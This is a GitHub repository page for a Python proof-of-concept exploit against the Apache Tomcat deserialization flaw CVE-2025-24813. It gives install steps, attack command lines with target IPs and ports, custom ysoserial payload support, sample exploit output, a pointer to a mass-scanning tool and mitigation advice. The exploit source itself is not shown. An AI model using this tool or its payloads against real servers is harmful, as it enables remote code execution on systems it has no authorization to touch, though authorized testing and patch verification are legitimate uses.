Skip to content

Mattb709/CVE-2025-24813-PoC-Apache-Tomcat-RCE

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

9 Commits
CVE-2025-24813-PoC.py
CVE-2025-24813-PoC.py
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 
requirements.txt
requirements.txt
 
 

Repository files navigation

Apache Tomcat CVE-2025-24813 Proof of Concept (PoC)

License Python

A proof-of-concept exploit for the Apache Tomcat deserialization vulnerability (CVE-2025-24813). This tool demonstrates how attackers could exploit insecure deserialization in Tomcat's session management.

WARNING: This tool is for authorized security testing and educational purposes only. Unauthorized use against systems you don't own is illegal.

Features

  • Supports both default (safe) and custom payloads
  • SSL/TLS support (with optional verification bypass)
  • Color-coded output for better visibility
  • Interactive payload selection
  • Configurable timeouts

Requirements

  • Python 3.x
  • Required packages (automatically installed via requirements.txt):
    • requests
    • colorama

Installation

git clone https://github.com/mattb709/CVE-2025-24813-PoC.git
cd CVE-2025-24813-PoC
pip install -r requirements.txt

Usage

Basic usage:

python CVE-2025-24813-PoC.py -t 192.168.1.100 -p 8080

Advanced options:

python CVE-2025-24813-PoC.py \
  -t 10.0.0.1 \
  -p 8443 \
  --protocol https \
  --no-verify \
  --timeout 15

Command Line Arguments

Argument Description Required
-t, --target Target IP address Yes
-p, --port Target port number Yes
--protocol http or https (default: http) No
--no-verify Disable SSL certificate verification No
--timeout Request timeout in seconds (default: 10) No

Payload Options

  1. Default Payload: Harmless serialized object (safe for detection)
  2. Custom Payload: Hex-encoded payload from tools like ysoserial

Example Output

[*] Apache Tomcat CVE-2025-24813 Exploit PoC 
[!] WARNING: For authorized testing only. Unauthorized use is illegal.

[*] Targeting http://192.168.1.100:8080

[*] Payload Options:
1. Use default dummy payload (safe, for detection)
2. Enter custom payload (hex-encoded, e.g., from ysoserial)
[?] Enter choice (1 or 2): 1
[*] Using default dummy payload.

[*] Attempting exploit...
[+] Success: Deserialization triggered (HTTP 500). Potential RCE if payload is malicious!

Related Tools

For mass scanning vulnerable systems:
🔍 CVE-2025-24813-Scanner - Bulk detection tool for vulnerable Tomcat hosts

Mitigation

If you're affected by this vulnerability:

  1. Upgrade to the latest patched version of Apache Tomcat
  2. Consider using a serialization filter

Legal Disclaimer

This software is provided under the MIT License. The author is not responsible for any misuse of this tool. Always obtain proper authorization before testing systems.

License

MIT License - See LICENSE file for details.

About

A Python proof-of-concept exploit for CVE-2025-24813 - Unauthenticated RCE in Apache Tomcat (v9.0.0-9.0.98/10.1.0-10.1.34/11.0.0-11.0.2) via malicious Java object deserialization. Includes safe detection mode and custom payload support.

Topics

cve-2025-24813

Resources

Readme

License

MIT license
Activity

Stars

4 stars

Watchers

1 watching

Forks

1 fork
Report repository

Releases

No releases published

Packages

 
 
 

Contributors

Languages